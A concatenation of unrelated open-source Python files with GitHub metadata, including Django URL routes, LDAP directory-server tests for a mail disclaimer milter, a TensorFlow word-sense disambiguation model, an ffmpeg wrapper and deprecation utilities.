server = strusMessage.RequestServer( processCommand, processShutdown)
server.start( myport)
print( "Terminated\n")
except Exception as e:
print( e)
| {
"content_hash": "204d3896980c09b8b42244f81b73026c",
"timestamp": "",
"source": "github",
"line_count": 98,
"max_line_length": 113,
"avg_line_length": 33.89795918367347,
"alnum_prop": 0.543046357615894,
"repo_name": "patrickfrey/strusTutorials",
"id": "3ae9629df88db8e7256e347480d355490fb94320",
"size": "3341",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "codeproject/Distributing-the-search-index-with-Strus/strusStatisticsServer.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "47956"
},
{
"name": "CMake",
"bytes": "6043"
},
{
"name": "HTML",
"bytes": "64587"
},
{
"name": "Perl",
"bytes": "1948"
},
{
"name": "Python",
"bytes": "69323"
},
{
"name": "Shell",
"bytes": "4067"
},
{
"name": "Smarty",
"bytes": "2075"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
from django.conf import settings
from django.conf.urls.static import static
from . import views
import profiles.urls
import accounts.urls
urlpatterns = patterns(
'',
url(r'^$', views.HomePage.as_view(), name='home'),
url(r'^about/$', views.AboutPage.as_view(), name='about'),
url(r'^', include(accounts.urls, namespace='accounts')),
url(r'^ideas/', include('ideas.urls', namespace='ideas')),
url(r'^users/', include(profiles.urls, namespace='profiles')),
url(r'^admin/', include(admin.site.urls)),
#json stuff
url(r'^categories/', views.get_categories_json, name="get_categories_json"),
#json stuff
url(r'^api-demo/', views.APIDemoPage.as_view(), name="api_demo"),
)
# User-uploaded files like profile pics need to be served in development
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| {
"content_hash": "24859d3bf7435216d8e7dacf82127f37",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 80,
"avg_line_length": 34,
"alnum_prop": 0.6995798319327731,
"repo_name": "adrwhong/csc309-startit",
"id": "cb0924726c993e473b5a25153cc8c892f5a1ab42",
"size": "952",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/startit/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "3381"
},
{
"name": "HTML",
"bytes": "42801"
},
{
"name": "JavaScript",
"bytes": "363"
},
{
"name": "Python",
"bytes": "32363"
}
],
"symlink_target": ""
} |
""" Directory server testing """
from email.mime.text import MIMEText
from unittest import SkipTest
from django.conf import settings
from django.test import TestCase
import ldap
import time
from disclaimr.query_cache import QueryCache
from disclaimrwebadmin import models, constants
from disclaimr.configuration_helper import build_configuration
from disclaimr.milter_helper import MilterHelper
class DirectoryServerTestCase(TestCase):
""" Build up different a resolution testsuite to test the directory server
resolution feature
"""
def setUp(self):
""" A basic setup with a simple disclaimer, no directory servers, a
basic rule and a basic action
"""
if not settings.TEST_DIRECTORY_SERVER_ENABLE:
# Skip this test, if it isn't enabled
raise SkipTest()
self.test_text = "Testmail"
# Build Disclaimer
disclaimer = models.Disclaimer()
disclaimer.name = "Test"
disclaimer.text = "{resolver[\"%s\"]}" % \
settings.TEST_DIRECTORY_SERVER["field"]
disclaimer.save()
# Build rule
self.rule = models.Rule()
self.rule.save()
# Build requirement
requirement = models.Requirement()
requirement.rule = self.rule
requirement.action = constants.REQ_ACTION_ACCEPT
requirement.save()
# Build directory server
self.directory_server = models.DirectoryServer()
self.directory_server.name = "Test"
self.directory_server.enabled = True
self.directory_server.enable_cache = False
self.directory_server.base_dn = \
settings.TEST_DIRECTORY_SERVER["base_dn"]
self.directory_server.search_query = \
settings.TEST_DIRECTORY_SERVER["query"]
if settings.TEST_DIRECTORY_SERVER["user_dn"] == "":
self.directory_server.auth = constants.DIR_AUTH_NONE
else:
self.directory_server.auth = constants.DIR_AUTH_SIMPLE
self.directory_server.userdn = \
settings.TEST_DIRECTORY_SERVER["user_dn"]
self.directory_server.password = \
settings.TEST_DIRECTORY_SERVER["password"]
self.directory_server.save()
self.directory_server_url = models.DirectoryServerURL()
self.directory_server_url.directory_server = self.directory_server
self.directory_server_url.url = settings.TEST_DIRECTORY_SERVER["url"]
self.directory_server_url.position = 0
self.directory_server_url.save()
# Build action
action = models.Action()
action.action = constants.ACTION_ACTION_ADD
action.disclaimer = disclaimer
action.rule = self.rule
action.position = 0
action.resolve_sender = True
action.save()
action.directory_servers = [self.directory_server]
action.save()
# We will not check against certificates here
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_NEVER)
def tool_get_helper(self):
""" Return a configured milter helper
:return: A Milter helper
"""
configuration = build_configuration()
helper = MilterHelper(configuration)
# The requirement should basically be enabled
self.assertTrue(
helper.enabled,
"Helper wasn't enabled after initialization."
)
return helper
def tool_run_real_test(self, address=None, sender_fail=False):
""" Runs the test using the milter helper and returns the action
dictionary of eob
:return: the action dictionary of eob()
"""
if address is None:
address = settings.TEST_DIRECTORY_SERVER["address"]
if sender_fail:
action = models.Action.objects.filter(rule__id=self.rule.id)[0]
action.resolve_sender_fail = sender_fail
action.save()
helper = self.tool_get_helper()
helper.connect("", "", "1.1.1.1", "", {})
helper.mail_from(address, {})
helper.rcpt(address, {})
helper.header("From", "nobody", {})
helper.eoh({})
helper.body(MIMEText(self.test_text).as_string(), {})
return helper.eob({})
def test_disabled_directoryserver(self):
""" If we disable the directory server (and set the resolution to
not fail, which is the default), we should get the
text of our email plus a newline resulting of the addition of the
(empty) disclaimer back.
"""
self.directory_server.enabled = False
self.directory_server.save()
returned = self.tool_run_real_test()
self.assertEqual(
returned["repl_body"],
"%s\n" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_replacement(self):
""" Try to resolve the sender and test the resulting replacement.
"""
returned = self.tool_run_real_test()
self.assertEqual(
returned["repl_body"],
"%s\n%s" % (
self.test_text,
settings.TEST_DIRECTORY_SERVER["value"]
),
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_replacement_fail(self):
""" If we cannot resolve the sender and set resolution to fail,
we should get an unmodified mail back.
"""
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(
address="%s|FAILED|" % settings.TEST_DIRECTORY_SERVER["address"],
sender_fail=True
)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_replacement_not_fail(self):
""" If we cannot resolve the sender and don't set resolution to fail,
        we should get back a modified mail with the unresolvable fields
        removed.
"""
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(
address="%s|FAILED|" % settings.TEST_DIRECTORY_SERVER["address"],
)
self.assertEqual(
returned["repl_body"],
"%s\n" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_caching(self):
""" Test the query cache feature by checking, if a query was cached
"""
self.directory_server.enable_cache = True
self.directory_server.save()
        # Run the real test and check whether the query was cached
self.tool_run_real_test()
self.assertIn(
self.directory_server.id,
QueryCache.cache,
"Directory server wasn't cached at all!"
)
self.assertGreater(
len(QueryCache.cache[self.directory_server.id]),
1,
"Item seemingly wasn't cached."
)
# Clean the cache for other tests
QueryCache.cache = {}
def test_caching_timeout(self):
""" Test the query cache timeout by mimicing the use
"""
self.directory_server.enable_cache = True
self.directory_server.cache_timeout = 1
self.directory_server.save()
QueryCache.set(self.directory_server, "TEST", "TEST")
self.assertIsNotNone(
QueryCache.get(self.directory_server, "TEST"),
"Cached item wasn't returned."
)
# Sleep for the cache to time out
time.sleep(self.directory_server.cache_timeout + 1)
self.assertIsNone(
QueryCache.get(self.directory_server, "TEST"),
"Cached item didn't time out."
)
# Clean the cache for other tests
QueryCache.cache = {}
def test_caching_flush(self):
""" Test the query cache flushing method
"""
self.directory_server.enable_cache = True
self.directory_server.cache_timeout = 1
self.directory_server.save()
QueryCache.set(self.directory_server, "TEST", "TEST")
self.assertIsNotNone(
QueryCache.get(self.directory_server, "TEST"),
"Cached item wasn't returned."
)
# Sleep for the cache to time out
time.sleep(self.directory_server.cache_timeout + 1)
QueryCache.flush()
# The cache should be empty now
self.assertEqual(len(QueryCache.cache), 0, "The cache wasn't flushed.")
# Clean the cache for other tests
QueryCache.cache = {}
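    # Sketch of the QueryCache interface exercised by these tests (only the
    # calls that actually appear in this file; anything beyond them would be
    # an assumption):
    #
    #   QueryCache.set(directory_server, key, value)  # stored under directory_server.id
    #   QueryCache.get(directory_server, key)         # None once cache_timeout has passed
    #   QueryCache.flush()                            # drops timed-out entries
    #   QueryCache.cache = {}                         # full reset used between tests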
def test_unreachable(self):
""" Test an unreachable directory server
"""
# Replace the directory server url with something invalid
self.directory_server_url.url = "ldap://1.1.1.1"
self.directory_server_url.save()
# Run the real test and expect it to not modify the body
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_invalid_auth(self):
""" Test invalid username/password for a directory server
"""
self.directory_server.userdn = "FAULT"
self.directory_server.password = "FAULT"
self.directory_server.save()
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_unreachable_guest(self):
""" Test an unreachable directory server without simple auth
"""
self.directory_server_url.url = "ldap://1.1.1.1"
self.directory_server_url.save()
self.directory_server.auth = constants.DIR_AUTH_NONE
self.directory_server.save()
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_invalid_auth_guest(self):
""" Test invalid username/passwort for a directory server without
simple auth. Disabling simple auth on the directory
server when connecting to a simple-auth-requiring ldap server should be
a sufficient test.
"""
self.directory_server.auth = constants.DIR_AUTH_NONE
self.directory_server.save()
# Run the real test with a modified, possibly failing address
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
def test_multiple(self):
""" Test for multiple resolved addresses
"""
# Broaden the search query a bit...
self.directory_server.search_query = "(|(objectclass=*)(mail=%s))"
self.directory_server.save()
returned = self.tool_run_real_test(sender_fail=True)
self.assertEqual(
returned["repl_body"],
"%s" % self.test_text,
"Body was unexpectedly modified to %s" % returned["repl_body"]
)
| {
"content_hash": "28ba571386bf2803511f5be85ba10b89",
"timestamp": "",
"source": "github",
"line_count": 419,
"max_line_length": 79,
"avg_line_length": 28.176610978520287,
"alnum_prop": 0.5957140437065899,
"repo_name": "dploeger/disclaimr",
"id": "72eeaf13507f0c87a6ec2ea70cf213de20c82958",
"size": "11806",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_directoryserver.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "1155"
},
{
"name": "Python",
"bytes": "132303"
},
{
"name": "Ruby",
"bytes": "298"
}
],
"symlink_target": ""
} |
"""Beam DoFns and PTransforms to provide validation of improvements models."""
from __future__ import annotations
from core.jobs import job_utils
from core.jobs.decorators import validation_decorators
from core.jobs.types import improvements_validation_errors
from core.platform import models
import apache_beam as beam
from typing import Iterator
MYPY = False
if MYPY: # pragma: no cover
from mypy_imports import improvements_models
(improvements_models,) = models.Registry.import_models(
[models.Names.IMPROVEMENTS])
# TODO(#15613): Here we use MyPy ignore because the incomplete typing of
# apache_beam library and absences of stubs in Typeshed, forces MyPy to
# assume that DoFn class is of type Any. Thus to avoid MyPy's error (Class
# cannot subclass 'DoFn' (has type 'Any')), we added an ignore here.
@validation_decorators.AuditsExisting(improvements_models.TaskEntryModel)
class ValidateCompositeEntityId(beam.DoFn): # type: ignore[misc]
"""DoFn to validate the composite entity id."""
def process(
self, input_model: improvements_models.TaskEntryModel
) -> Iterator[improvements_validation_errors.InvalidCompositeEntityError]:
"""Function that checks if the composite entity id is valid
Args:
input_model: improvements_models.TaskEntryModel.
Entity to validate.
Yields:
InvalidCompositeEntityError. Error for models with
invalid composite entity.
"""
model = job_utils.clone_model(input_model)
expected_composite_entity_id = (
improvements_models.TaskEntryModel.generate_composite_entity_id(
model.entity_type, model.entity_id, model.entity_version))
if model.composite_entity_id != expected_composite_entity_id:
yield improvements_validation_errors.InvalidCompositeEntityError(
model)
| {
"content_hash": "c7ed4d798c615c474e3773631a19b5fb",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 78,
"avg_line_length": 38.02,
"alnum_prop": 0.7185691741188848,
"repo_name": "oppia/oppia",
"id": "f37da54aec4f62cd58f45430e97e4276bc950304",
"size": "2524",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "core/jobs/transforms/validation/improvements_validation.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "476480"
},
{
"name": "HTML",
"bytes": "2092923"
},
{
"name": "JavaScript",
"bytes": "1247116"
},
{
"name": "PEG.js",
"bytes": "71377"
},
{
"name": "Python",
"bytes": "17628953"
},
{
"name": "Shell",
"bytes": "2240"
},
{
"name": "TypeScript",
"bytes": "15541372"
}
],
"symlink_target": ""
} |
import subprocess
class AudioProcessor(object):
def __init__(self,
decoder='ffmpeg',
encoder='ffmpeg',
stretcher='wavstretch',
encoderOpts=None,
stretcherOpts=None):
self.decoder = decoder
self.encoder = encoder
self.stretcher = stretcher
if encoderOpts:
self.encoderOpts = encoderOpts
else:
self.encoderOpts = []
        if stretcherOpts:
self.stretcherOpts = stretcherOpts
else:
self.stretcherOpts = []
def encode(self, inputfile, outputfile):
command = [self.encoder] + self.encoderOpts
subprocess.call(command + ["-i", inputfile, outputfile])
subprocess.call(["rm", inputfile])
def decode(self, inputfile, outputfile):
subprocess.call([self.decoder, "-i", inputfile, outputfile])
subprocess.call(["rm", inputfile])
def stretch(self, inputfile, outputfile):
command = [self.stretcher] + self.stretcherOpts
fileargs = ["-i", inputfile, "-o", outputfile]
subprocess.call(command + fileargs)
subprocess.call(["rm", inputfile])
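# Illustrative usage sketch (file names are hypothetical; note that every
# method deletes its input file once the external tool returns):
#
#   processor = AudioProcessor()
#   processor.decode('track.mp3', 'track.wav')
#   processor.stretch('track.wav', 'track_slow.wav')
#   processor.encode('track_slow.wav', 'track_slow.mp3')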
if __name__ == '__main__':
import unittest
from tests.testaudioprocessor import TestAudioProcessor
TestAudioProcessor.header()
unittest.main()
| {
"content_hash": "f6b1f0bd952bc27bd52557df174e3d0c",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 68,
"avg_line_length": 29.02127659574468,
"alnum_prop": 0.5909090909090909,
"repo_name": "rumblesan/dronr",
"id": "e2e9d6a07caf4508abcc319570f1f4f28f7e5f42",
"size": "1387",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "audioprocessor.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "4874"
}
],
"symlink_target": ""
} |
from abc import abstractmethod
import tensorflow as tf
from tensorflow.contrib.rnn import LSTMCell, LSTMStateTuple
from constant import WORD2VEC_EMB_DIMENSION, WORD2VEC_PATH
from data_loader import build_vocab, get_embedding_weights, get_word2vec_model, prepare_data, start_threads
LOGGER = None
class SimpleDisambiguator(object):
    @abstractmethod
def fit(self, max_steps=None):
raise NotImplementedError("Implement this method")
    @abstractmethod
def disambiguate(self, sentence_iterator):
raise NotImplementedError("Implement this method")
    @abstractmethod
def score(self, test_data_iterator):
raise NotImplementedError("Implement this method")
class NeuralDisambiguator(SimpleDisambiguator):
def __init__(self, dataset, opts, use_pretrained_embeddings=True):
# TODO: Add Dropout layer later.
self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
if use_pretrained_embeddings:
word2vec = get_word2vec_model(WORD2VEC_PATH)
word2idx, idx2word, label2idx, idx2label = build_vocab(dataset.training_files, dataset.vocab_file, word2vec,
min_counts=opts['min_counts'])
embedding_weights = get_embedding_weights(word2idx, word2vec)
embedding_length = embedding_weights.shape[1]
# TODO: embedding might be trainable.
self.embeddings = tf.Variable(embedding_weights, dtype=tf.float32, trainable=False)
else:
word2idx, idx2word, label2idx, idx2label = build_vocab(dataset.training_files, dataset.vocab_file,
min_counts=opts['min_counts'])
embedding_length = opts['embedding_length']
self.embeddings = tf.Variable(tf.random_uniform([len(word2idx), embedding_length], -1.0, 1.0),
dtype=tf.float32)
self.sess = tf.Session()
self.enqueue_data, self.source, self.target_word, self.label, \
self.sequence_length = prepare_data(self.sess, dataset.training_files, word2idx, label2idx, **opts)
self.target_words_embedded = tf.nn.embedding_lookup(self.embeddings, self.target_word)
self.sentences_embedded = tf.nn.embedding_lookup(self.embeddings, self.source)
hidden_unit_size = opts['hidden_unit_size']
num_senses = len(label2idx)
encoder_cell = LSTMCell(hidden_unit_size)
(encoder_fw_outputs, encoder_bw_outputs), (encoder_fw_final_state, encoder_bw_final_state) = \
tf.nn.bidirectional_dynamic_rnn(cell_fw=encoder_cell, cell_bw=encoder_cell, inputs=self.sentences_embedded,
sequence_length=self.sequence_length, dtype=tf.float32, time_major=True)
encoder_final_state_c = tf.concat((encoder_fw_final_state.c, encoder_bw_final_state.c), 1)
encoder_final_state_h = tf.concat((encoder_fw_final_state.h, encoder_bw_final_state.h), 1)
encoder_final_state = LSTMStateTuple(c=encoder_final_state_c, h=encoder_final_state_h)
# self.encoder_target_embedding = encoder_final_state.c
self.encoder_target_embedding = tf.concat((encoder_final_state.c, self.target_words_embedded), 1)
with tf.name_scope("output"):
W = tf.Variable(tf.truncated_normal([hidden_unit_size * 2 + embedding_length, num_senses],
stddev=0.1), name="W")
b = tf.Variable(tf.constant(0.1, shape=[num_senses]), name="b")
self.scores = tf.matmul(self.encoder_target_embedding, W) + b
self.predictions = tf.argmax(self.scores, 1, name="predictions")
with tf.name_scope('cross_entropy'):
labels = tf.one_hot(self.label, num_senses)
self.diff = tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=self.scores)
with tf.name_scope('loss'):
self.loss = tf.reduce_mean(self.diff)
with tf.name_scope('train'):
self.train_step = tf.train.AdamOptimizer(opts['learning_rate']).minimize(self.loss)
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
correct_prediction = tf.equal(self.predictions, tf.argmax(labels, 1))
with tf.name_scope('accuracy'):
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
self.sess.run(tf.global_variables_initializer())
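    # Note on dimensions, derived from the graph built in __init__ above: the
    # forward and backward LSTM final states are concatenated (giving
    # 2 * hidden_unit_size features) and then concatenated with the target
    # word embedding, which is why the output weight W has shape
    # [hidden_unit_size * 2 + embedding_length, num_senses].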
def disambiguate(self, test_data_iterator):
pass
def fit(self, max_steps=1000):
coord = tf.train.Coordinator()
enqueue_threads = start_threads(self.enqueue_data, [coord, ])
threads = tf.train.start_queue_runners(sess=self.sess, coord=coord)
threads.extend(enqueue_threads)
try:
for i in range(max_steps):
_, loss = self.sess.run([self.train_step, self.loss])
if i % 100 == 0:
print(i, loss)
except tf.errors.OutOfRangeError:
print("Done training")
except KeyboardInterrupt:
print("Force stop.")
coord.request_stop()
coord.join(threads)
def score(self, test_data_iterator):
pass
| {
"content_hash": "bb42fc8d2e0bb2db099970c31d561242",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 120,
"avg_line_length": 43.942622950819676,
"alnum_prop": 0.6282409998134676,
"repo_name": "osmanbaskaya/coarse-wsd",
"id": "a79279e900ccecbbcdef3f4625852968b82f8842",
"size": "5361",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "coarse-wsd/disambiguate/model.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Java",
"bytes": "8026"
},
{
"name": "Makefile",
"bytes": "5421"
},
{
"name": "Python",
"bytes": "103973"
}
],
"symlink_target": ""
} |
import arrow
from betterapis import db
class Review(db.Model, SimpleSerializing):
id = db.Column(db.Integer, primary_key=True)
talk_id = db.Column(db.Integer)
details = db.Column(db.String)
def __init__(self, **kwargs):
self.talk_id = kwargs.get('talk_id')
self.details = kwargs.get('details')
def update(self, **kwargs):
self.__init__(**kwargs)
def __repr__(self):
return '<Review {} {}>'.format(self.talk_id, self.details)
| {
"content_hash": "3c05fa1c5535f8c92f6ad0f46f3b88aa",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 66,
"avg_line_length": 28.529411764705884,
"alnum_prop": 0.6164948453608248,
"repo_name": "tylerdave/OpenAPI-Tutorial",
"id": "50c420bd261223ce358c2e19e2f2549d1edd1f28",
"size": "485",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lessons/lesson-2.05/models_solution.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2528"
},
{
"name": "HTML",
"bytes": "55368"
},
{
"name": "Python",
"bytes": "8999"
}
],
"symlink_target": ""
} |
import time
import os
import getopt
import sys
class Log:
"""规范日志类"""
fn = ''
au = ''
dt = ''
con = ''
def __init__(self):
current_date = self.fetch_current_date()
self.fn = current_date + '.md'
self.au = 'Lu Hao'
self.dt = current_date
self.con = self.fetch_template_content()
self.generate_log_file()
def check_file_exist(self):
cur_dir_list = os.listdir(os.getcwd())
if cur_dir_list.count(self.fn) == 0:
return False
return True
def fetch_current_date(self):
return time.strftime('%Y-%m-%d')
def fetch_template_content(self):
f = open('template.txt', 'r')
tpl = f.read()
return tpl
def replace_template_content(self):
self.con = self.con.replace('DATE', self.dt)
self.con = self.con.replace('AUTHOR', self.au)
def generate_log_file(self):
if self.check_file_exist():
            print u'File already exists TuT'
else:
f = open(self.fn, 'w')
self.replace_template_content()
f.write(self.con)
            print u'File generated ^V^'
if __name__ == '__main__':
    # python scriptname.py -f 'hello' --directory-prefix=/home -t --format 'a' 'b'
shortargs = 'f:t'
longargs = ['directory-prefix=', 'format', '--f_long=']
opts, args = getopt.getopt(sys.argv[1:], shortargs, longargs)
log = Log()
| {
"content_hash": "4a909ad450469f58665569f93ffcd682",
"timestamp": "",
"source": "github",
"line_count": 56,
"max_line_length": 83,
"avg_line_length": 25.446428571428573,
"alnum_prop": 0.5417543859649123,
"repo_name": "lhzbxx/QiLe2",
"id": "9b4b3ed20b81d0605e8c875e27ea840cfcd34f4e",
"size": "1622",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "devlog/generator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "37"
},
{
"name": "CSS",
"bytes": "33433"
},
{
"name": "HTML",
"bytes": "28253"
},
{
"name": "JavaScript",
"bytes": "9749"
},
{
"name": "Python",
"bytes": "26528"
}
],
"symlink_target": ""
} |
"""Deprecation utilities
:author: Logilab
:copyright: 2006-2008 LOGILAB S.A. (Paris, FRANCE)
:contact: http://www.logilab.fr/ -- mailto:[email protected]
"""
__docformat__ = "restructuredtext en"
import sys
from warnings import warn
from clonedigger.logilab.common.modutils import LazyObject, load_module_from_name
class deprecated(type):
"""metaclass to print a warning on instantiation of a deprecated class"""
def __call__(cls, *args, **kwargs):
msg = getattr(cls, "__deprecation_warning__",
"%s is deprecated" % cls.__name__)
warn(msg, DeprecationWarning, stacklevel=2)
return type.__call__(cls, *args, **kwargs)
def class_renamed(old_name, new_class, message=None):
"""automatically creates a class which fires a DeprecationWarning
when instantiated.
>>> Set = class_renamed('Set', set, 'Set is now replaced by set')
>>> s = Set()
sample.py:57: DeprecationWarning: Set is now replaced by set
s = Set()
>>>
"""
clsdict = {}
if message is None:
message = '%s is deprecated' % old_name
clsdict['__deprecation_warning__'] = message
try:
# new-style class
return deprecated(old_name, (new_class,), clsdict)
except (NameError, TypeError):
# old-style class
class DeprecatedClass(new_class):
"""FIXME: There might be a better way to handle old/new-style class
"""
def __init__(self, *args, **kwargs):
warn(message, DeprecationWarning, stacklevel=2)
new_class.__init__(self, *args, **kwargs)
return DeprecatedClass
def class_moved(new_class, old_name=None, message=None):
"""nice wrapper around class_renamed when a class has been moved into
another module
"""
if old_name is None:
old_name = new_class.__name__
if message is None:
message = 'class %s is now available as %s.%s' % (
old_name, new_class.__module__, new_class.__name__)
return class_renamed(old_name, new_class, message)
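# Illustrative use (module and class names hypothetical): if ``Thing`` now
# lives in ``new.module``, then ``OldThing = class_moved(Thing)`` returns a
# subclass that warns "class Thing is now available as new.module.Thing"
# every time it is instantiated.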
def deprecated_function(new_func, message=None):
"""creates a function which fires a DeprecationWarning when used
For example, if <bar> is deprecated in favour of <foo> :
>>> bar = deprecated_function(foo, 'bar is deprecated')
>>> bar()
sample.py:57: DeprecationWarning: bar is deprecated
bar()
>>>
"""
if message is None:
message = "this function is deprecated, use %s instead" % (
new_func.func_name)
def deprecated(*args, **kwargs):
warn(message, DeprecationWarning, stacklevel=2)
return new_func(*args, **kwargs)
return deprecated
def moved(modpath, objname):
"""use to tell that a callable has been moved to a new module.
It returns a callable wrapper, so that when its called a warning is printed
telling where the object can be found, import is done (and not before) and
the actual object is called.
NOTE: the usage is somewhat limited on classes since it will fail if the
wrapper is use in a class ancestors list, use the `class_moved` function
instead (which has no lazy import feature though).
"""
def callnew(*args, **kwargs):
message = "object %s has been moved to module %s" % (objname, modpath)
warn(message, DeprecationWarning, stacklevel=2)
m = load_module_from_name(modpath)
return getattr(m, objname)(*args, **kwargs)
return callnew
class WarnLazyObject(LazyObject):
def __init__(self, oldname, newname):
# XXX doesn't work if module isn't in a package
package, module = newname.rsplit('.', 1)
super(WarnLazyObject, self).__init__(package, module)
self.oldname = oldname
self.newname = newname
print 'hop', oldname, newname
sys.modules[oldname] = self
def __getobj(self):
if self._imported is None:
message = "module %s has moved, it's now %s" % (
self.oldname, self.newname)
warn(message, DeprecationWarning, stacklevel=2)
return super(WarnLazyObject, self).__getobj()
module_moved = WarnLazyObject
def obsolete(reason="This function is obsolete"):
"""this function is an alternative to `deprecated_function`
when there's no real replacement for the deprecated function
"""
def newdecorator(func):
def wrapped(*args, **kwargs):
warn(reason, DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
return wrapped
return newdecorator
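# Illustrative use (function name hypothetical): decorating a function with
# @obsolete("frobnicate() is obsolete") keeps it callable but emits a
# DeprecationWarning on every invocation.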
| {
"content_hash": "892f3538cccf63faea1a71bfad40a15f",
"timestamp": "",
"source": "github",
"line_count": 132,
"max_line_length": 81,
"avg_line_length": 34.833333333333336,
"alnum_prop": 0.6346237494562853,
"repo_name": "h2oloopan/easymerge",
"id": "7045e260cd168fc708bad81248bc4893830dac9f",
"size": "5297",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "EasyMerge/clonedigger/logilab/common/deprecation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "13487"
},
{
"name": "CSS",
"bytes": "416664"
},
{
"name": "D",
"bytes": "2012"
},
{
"name": "Java",
"bytes": "583078"
},
{
"name": "JavaScript",
"bytes": "285692"
},
{
"name": "Python",
"bytes": "4212549"
},
{
"name": "Ruby",
"bytes": "920"
},
{
"name": "Shell",
"bytes": "40508"
},
{
"name": "TeX",
"bytes": "114952"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('visit', '0050_auto_20150810_2027'),
]
operations = [
migrations.AlterField(
model_name='staff',
name='is_visit_1_trained',
field=models.DateField(null=True, blank=True),
),
migrations.AlterField(
model_name='staff',
name='is_visit_2_trained',
field=models.DateField(null=True, blank=True),
),
]
| {
"content_hash": "a406ac07b9c219981ece98e8b4e491b1",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 58,
"avg_line_length": 24.652173913043477,
"alnum_prop": 0.5731922398589065,
"repo_name": "koebbe/homeworks",
"id": "413238285ad98fa0290b295ae3ca229a94679e92",
"size": "591",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "visit/migrations/0051_auto_20150810_2033.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "44210"
},
{
"name": "HTML",
"bytes": "69003"
},
{
"name": "JavaScript",
"bytes": "124572"
},
{
"name": "Python",
"bytes": "223075"
}
],
"symlink_target": ""
} |
from setuptools import setup, find_packages
from mimiron import __version__
setup(
name='mimiron',
version=__version__,
description="Easily manage your tfvars config via Mimiron",
url='https://github.com/ImageIntelligence/mimiron',
author='David Vuong',
author_email='[email protected]',
classifiers=[
'Intended Audience :: Developers',
'Environment :: Console',
'Topic :: Utilities',
'Programming Language :: Python :: 2 :: Only',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
],
packages=find_packages(exclude=['contrib', 'docs', 'test*']),
install_requires=[
'docopt==0.6.2',
'terminaltables==3.1.0',
'jsonschema==2.6.0',
'GitPython==2.1.8',
'requests==2.13.0',
'humanize==0.5.1',
'python-dateutil==2.6.0',
],
include_package_data=True,
package_data={'': ['README.md']},
entry_points={
'console_scripts': [
'mim=mimiron.command_line:main',
],
},
)
| {
"content_hash": "f84c4dd42c483a64dd3d981d3d0e1eb0",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 65,
"avg_line_length": 24.954545454545453,
"alnum_prop": 0.569216757741348,
"repo_name": "ImageIntelligence/mimiron",
"id": "8a6be46e0a0d16460dcba2bad3b6a2ec05d2e986",
"size": "1144",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "27905"
}
],
"symlink_target": ""
} |
"""Volume drivers for libvirt."""
import os
from os_brick.initiator import connector
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
import six
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LW
from nova import paths
from nova import utils
